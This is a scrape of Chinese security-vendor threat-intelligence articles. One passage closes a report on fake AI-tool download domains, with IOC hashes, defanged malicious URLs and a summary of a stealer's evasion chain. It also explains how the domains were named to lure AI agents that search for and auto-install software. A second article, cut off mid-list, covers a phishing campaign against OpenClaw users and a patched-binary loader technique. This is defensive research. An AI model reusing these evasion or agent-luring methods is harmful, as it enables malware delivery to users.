【复制DNS响应】将HTTP响应体中的DNS消息复制到v9缓冲区进行解析</span></span></p></code></pre></p><h2 data-line="334" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">IOCs</span></h2><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);min-width:125px;"><thead><tr><th data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">类型     </span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">IOC       </span></p></th></tr></thead><tbody><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">A7C6F827D525C7FE494D14A77410C697</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">f2e4f83e998b320b43b4671192917a85</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">91f1b9637f551921cc6d7f966c43ef5a</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">DOMAIN</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">claude-code[.]official-version[.]com</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">DOMAIN</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">openclaw[.]official-version[.]com</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">DOMAIN</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">doubao[.]official-version[.]com</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">DOMAIN</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">qimi[.]install-files[.]com</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">DOMAIN</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">qwen[.]install-files[.]com</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">DOMAIN</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">kimi[.]install-files[.]com</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">DOMAIN</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">google-notebooklm[.]install-files[.]com</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">DOMAIN</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">openclaw[.]install-files[.]com</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">DOMAIN</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">claude-code[.]install-files[.]com</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">https[:]//claude-code.official-version[.]com/claude</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">https[:]//download-version.1-45-1[.]com/claude</span></p></td></tr><tr><td data-colwidth="100" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">https[:]//download.active-version[.]com/claude</span></p></td></tr></tbody></table></p><h2 data-line="354" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">结语</span></h2><p data-line="356" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AI 智能体的“灯下黑”：从被动拦截到认知防御的必修课</span></strong></p><p data-line="358" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">纵观这起攻击事件，最值得行业警惕的，是黑产在社会工程学上完成的</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">跨界双杀</span></strong><span leaf="">。他们不仅把诱饵抛向了人类开发者，更精准拿捏了 AI 智能体的思维方式。通过批量注册覆盖 OpenClaw、Claude Code等一众热门 AI 产品的仿冒域名，并刻意拼接 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">official-version</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">install-files</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">download-version</span></code><span leaf=""> 等极具软件分发特征的关键词，攻击者实际上完成了一次针对大模型语义理解的</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">定向投喂</span></strong><span leaf="">。当你的 AI 助手在全网检索并试图自动完成安装任务时，这些高度契合其底层语义偏好的恶意站点，会被它判定为“最权威的官方来源”，从而在静默中拉开了整条攻击链的序幕。</span></p><p data-line="360" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">而在技术对抗层面，攻击者同样展现出了极其老练的战术素养。为了护送 Amatera 窃密后门变种安然落地，攻击者打出了一套极其扎实的免杀组合拳：从最初利用 ZIP/DLL/PDF 文件头部填充进行格式伪装，到 HTA 脚本的深度十六进制混淆；从巧妙构造 .NET 反序列化链绕过本地安全检查，再到最终的 Shellcode 内存无文件加载，每一步都算计得极其精准。更棘手的是，该变种在通信阶段直接集成了 DoH（DNS-over-HTTPS）技术，巧妙借道 Google 的 DoH 服务来隐藏 C2 服务器的 DNS 解析轨迹，让传统的网络层流量监控瞬间陷入灯下黑的被动局面。</span></p><p data-line="362" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这起案例给我们敲响了最沉重的警钟：当 AI 智能体以前所未有的深度接管我们的工作流时，AI智能体正在成为企业边界防御中最脆弱的新盲区。在享受一句话让 AI 干活的便利时，我们的安全理念必须完成从动作防御向认知防御的跃迁：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">对于开发者：</span></strong><span leaf=""> 任何涉及系统底层权限、网络拉取及软件安装的敏感操作，在交由联网智能体执行前，必须加上一道“人工确认”的底线。切忌盲目下放权限或直接复制执行来历不明的命令行指令。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">对于企业安全团队：</span></strong><span leaf=""> 传统的基于 IP/域名黑名单的防御已不足以应对这种“信任寄生”攻击。必须加速将针对 AI 供应链和新型钓鱼手法的威胁情报体系，深度整合至终端防护（EDR）及网络流量分析（NDA）系统中，做到对异常链式调用的毫秒级阻断。</span></p></li></ul><p data-line="367" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">针对OpenClaw安全风险，腾讯推出多场景安全防护矩阵：</span></strong></p><p data-line="369" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">本地个人：</span></strong></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="370" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">腾讯电脑管家18.0版本为C端用户提供「龙虾管家-AI安全沙箱」，可实现“隔离运行、全程防护、行为可溯”，将“龙虾”放到“安全隔离房”里。</span></span></p></blockquote><p data-line="372" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">本地企业：</span></strong></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="373" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">腾讯iOA为B端企业推出办公网安全方案，管控安装非法插件（Skills）、阻断非法访问、拦截数据窃取、限制违规外发，为企业构建全生命周期的安全防御。</span></span></p></blockquote><p data-line="375" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">云端部署</span></strong><span leaf="">：</span></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="376" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">Lighthouse 与腾讯云 ClawPro 自带云端物理防爆箱：环境隔离、最小化端口放行、一键快照回滚 </span></span></p><p data-line="376" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">AI Agent安全中心对 AI Agent 部署情况、Agent 行为、异常指令以及 skills 风险进行全面管理与防护 </span></span></p><p data-line="376" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">Agent Runtime 提供 VM 级强隔离、网络隔离、文件隔离、零凭证访问等能力，支持数十万实例并发</span></span></p></blockquote><p data-line="380" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Skills安全</span></strong><span leaf="">：</span></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="381" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">EdgeOne ClawScan 一句话即可让龙虾自己安装，自动 “体检” 并输出报告 </span></span></p><p data-line="381" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">HaS Anonymizer 隐私保护，支持文本 / 图片信息扫描、脱敏和还原 </span></span></p><p data-line="381" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">威胁情报中心 Skills安全检测，构建覆盖互联网威胁发现与未知样本检测的全方面防护能力</span></span></p></blockquote><p data-line="386" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">腾讯将持续跟进AI时代面临的新型威胁态势，为拥抱AI的每位用户保驾护航。</span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.80546875" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100027713" src="https://wechat2rss.xlab.app/img-proxy/?k=9902de5d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwXcdoyCTDLiaY8n4lL85KWGofq03Mac60k4F9J3MReqqmfmdDp7XaoIdoNhdO7iayUiaExD687cxFxZA3uafRv8lVOcVNcV9KKUws%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=f9b222fa&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511428%26idx%3D1%26sn%3D679549b2025149f11863d46357626017">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 17 Mar 2026 17:17:00 +0800</pubDate>
    </item>
    <item>
      <title>“银狐”盯上“小龙虾” | 针对 OpenClaw 热点流量的工业化钓鱼活动</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511363&amp;idx=1&amp;sn=9485e074967faba84eae17b1522382c4</link>
      <description>伴随AI助理OpenClaw火爆，黑灰产迅速跟进。腾讯安全发现“银狐”团伙利用近千个仿冒域名及AI生成的欺诈页面，发起大规模、低成本钓鱼攻击，精准收割用户流量。</description>
      <content:encoded><![CDATA[<p><span>腾讯安全威胁情报</span> <span>2026-03-14 09:05</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=30c3dda7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwVaUBufexUZtay3j5CSqNgDnRCJnyDnYuJsVdOgcxfNNduZ9WfC66bQDLcZhw3jhiaDE8GDctImpuZXJJKhQGcLZLIic3pMwf464%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>伴随AI助理OpenClaw火爆，黑灰产迅速跟进。腾讯安全发现“银狐”团伙利用近千个仿冒域名及AI生成的欺诈页面，发起大规模、低成本钓鱼攻击，精准收割用户流量。</p>
  <div style="font-family: -apple-system-font,BlinkMacSystemFont, Helvetica Neue, PingFang SC, Hiragino Sans GB , Microsoft YaHei UI , Microsoft YaHei ,Arial,sans-serif;font-size: 16px;line-height: 1.75;text-align: left;"><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;margin-top: 0 !important;"><span leaf="">2026 年春，OpenClaw （龙虾） 个人 AI 助理的持续火爆，黑灰产团伙银狐迅速嗅到了流量的血腥味，一场针对“养龙虾”用户的 SEO 投毒行动正悄然展开。</span></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">近日，腾讯安全威胁情报团队捕获了一批极具欺骗性的投毒域名，它们精准地切中了用户对“官方、稳定、中文版”的心理诱导：</span></p><ul style="margin-left: 0;color: #3f3f3f;list-style: none;padding-left: 1.5em;" class="list-paddingleft-1"><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p><span leaf="">• </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">典型诱导站点 A</span></strong><span leaf="">：<a href="https://ai-openclaw.com[.]cn/" target="_blank">https://ai-openclaw.com[.]cn/</a></span><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img data-aistatus="1" alt="https://ai-openclaw.com.cn/" class="rich_pages wxw-img" data-ratio="0.512962962962963" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 8px;box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);" data-imgfileid="100027705" src="https://wechat2rss.xlab.app/img-proxy/?k=e99e7837&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwVGyg3EZRZAqX6M3A7maJicjwEushHfAQczsHIPYW2hgTPysmJlKTFVic9bYZultTicVujWJDXK48ib3S0dksGErKt8qzkaFkE1a9I%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: rgb(136, 136, 136);font-size: 0.8em;line-height: 1em;"></figcaption></figure></p></li><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p style="line-height: 1em;"><span leaf="">• </span><strong style="color: rgb(0, 82, 217);font-weight: bold;font-size: inherit;"><span leaf="">典型诱导站点 B</span></strong><span leaf="">：<a href="https://www.web-openclaw.com[.]cn/" target="_blank">https://www.web-openclaw.com[.]cn/</a></span><span leaf=""><br/></span><figure style="margin: 1.5em 8px;color: rgb(63, 63, 63);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.512962962962963" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 8px;box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 8px;" data-imgfileid="100027706" src="https://wechat2rss.xlab.app/img-proxy/?k=42b0ec5b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwUFpIVtm8T7o0w3QBREKYCbPk8J3mXHwiaxvBZLl5XKICNbkb1LyvU0mBdRpvjKnBkwq92RGlic2xa56Q4KRHAEHaj99DEA5Q0sw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure></p></li><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p><span leaf="">• </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">典型诱导站点 C</span></strong><span leaf="">：<a href="https://openclaw-cn.hl[.]cn/index.html" target="_blank">https://openclaw-cn.hl[.]cn/index.html</a></span><span leaf=""><br/></span><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.512962962962963" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 8px;box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);" data-imgfileid="100027704" src="https://wechat2rss.xlab.app/img-proxy/?k=2436ddb9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwVAaYibeJK9j3UFDDNu59Pmje4nx0mBHegcrgyiadUzYbz8fiadq5MOBxouOxbwJth7U5cn0Hic1UHkDXRpiaib1CNtuur18xsEKtKX0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure></p></li></ul><h3 data-heading="true" style="margin: 2em 8px 0.75em 0;color: #3f3f3f;font-weight: bold;line-height: 1.2;padding-left: 12px;font-size: 19.2px;border-left: 4px solid rgba(0, 82, 217, 1);border-bottom: 1px dashed rgba(0, 82, 217, 1);"><span leaf="">页面层：AI 工厂里的“标准化欺诈”</span></h3><span leaf="">这批钓鱼网站呈现出高度一致的“AI 生成风格”。通过对 HTML 结构的深度扫描，我们发现了大量大模型辅助思考时留下的“残留注释”：那些人类程序员看起来啰嗦重复的注释，以及大模型特有的标准化冗余代码。</span><span leaf=""><br/></span><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.34629629629629627" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 8px;box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);" data-imgfileid="100027703" src="https://wechat2rss.xlab.app/img-proxy/?k=24441af1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwWkMlP9IjtOcJ46k5dKoIr49AwgOmqjLSjWibCw2SHyibCEEN5PT7qNa5INScVBBJspkZibXfDsYOhUOypAd1SkUdDiaBCguibJPCiaM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.45555555555555555" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 8px;box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);" data-imgfileid="100027702" src="https://wechat2rss.xlab.app/img-proxy/?k=5b470f1d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwVp7KQ7W3WSwxEq1XEJHxduOgeSNr1iar83HRpHrehaGqlJpHpJrZvrwKjicLcQ0Z0w4SPmAaocqLMX0lDXfhjh4Z4kucy4MfBhc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">这意味着银狐团伙已经完成了其内部工具链的 AI 化升级。他们不再依赖昂贵的人工设计，而是通过大模型批量生成热点话题页面，将钓鱼成本降至低点。配合 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">.com.cn</span></code><span leaf=""> 这种带有天然公信力的后缀，配合站点的seo优化，他们正将广撒网的策略运用在广大ai工具用户。</span></p><h3 data-heading="true" style="margin: 2em 8px 0.75em 0;color: #3f3f3f;font-weight: bold;line-height: 1.2;padding-left: 12px;font-size: 19.2px;border-left: 4px solid rgba(0, 82, 217, 1);border-bottom: 1px dashed rgba(0, 82, 217, 1);"><span leaf="">样本层：开源工具的“提线木偶化”</span></h3><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">在最新的攻击样本中，该团伙展示了一种极高段位的多重白加黑战术。</span></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">他们精心挑选了高信誉的开源二进制工具——如 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">hpatchz</span></code><span leaf="">（HDiffPatch 项目的补丁工具）——作为其恶意行为的载体。以 EXE 文件 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">e58beb4c5dba3c14a6627027ac03e30b</span></code><span leaf=""> 为例，其原始身份本是由库珀（Kuro）游戏项目编译的合法工具，但在银狐手中，它被 Patch 成了精密的加载器。</span></p><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">核心手法：改写导入表与函数随机化</span></strong><span leaf=""><br/></span><span leaf="">攻击者对合法程序进行了深度改写，通过 Patch 修改其导入表，将原本调用系统模块 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">kernel32.dll</span></code><span leaf=""> 的函数名全部进行了</span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">随机化篡改</span></strong><span leaf="">。这些虚假的函数调用被重定向至恶意模块 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">HLjjBgqULl.8</span></code><span leaf=""> (MD5: </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">d01848170c92af6c9ad07b97489f11b3</span></code><span leaf="">)。</span><span leaf=""><br/></span><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6194444444444445" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 8px;box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);" data-imgfileid="100027707" src="https://wechat2rss.xlab.app/img-proxy/?k=31a518da&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwWws3KZZNPRYxXd7vvYSz19CqjcjTAWgT8ehJSGwGrokdw0KPhBH5IicWeLn1I0YvXQrn4IAHjHziaZIZhib8FGo3jTC2MBbD7ZFc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">这种做法对抗成本极高：</span></p><ol style="margin-left: 0;color: #3f3f3f;padding-left: 1.5em;" class="list-paddingleft-1"><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p><span leaf="">1. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">规避特征检测</span></strong><span leaf="">：由于导入函数名被随机化，传统的基于 API 签名匹配的防护系统会彻底失灵。</span></p></li><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p><span leaf="">2. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">劫持清白身份</span></strong><span leaf="">：攻击者利用开源工具的“白名单”身份，在 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">DllEntryPoint</span></code><span leaf=""> 入口点执行恶意代码，构造出一种近似原文件的加载环境。</span></p></li><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p><span leaf="">3. 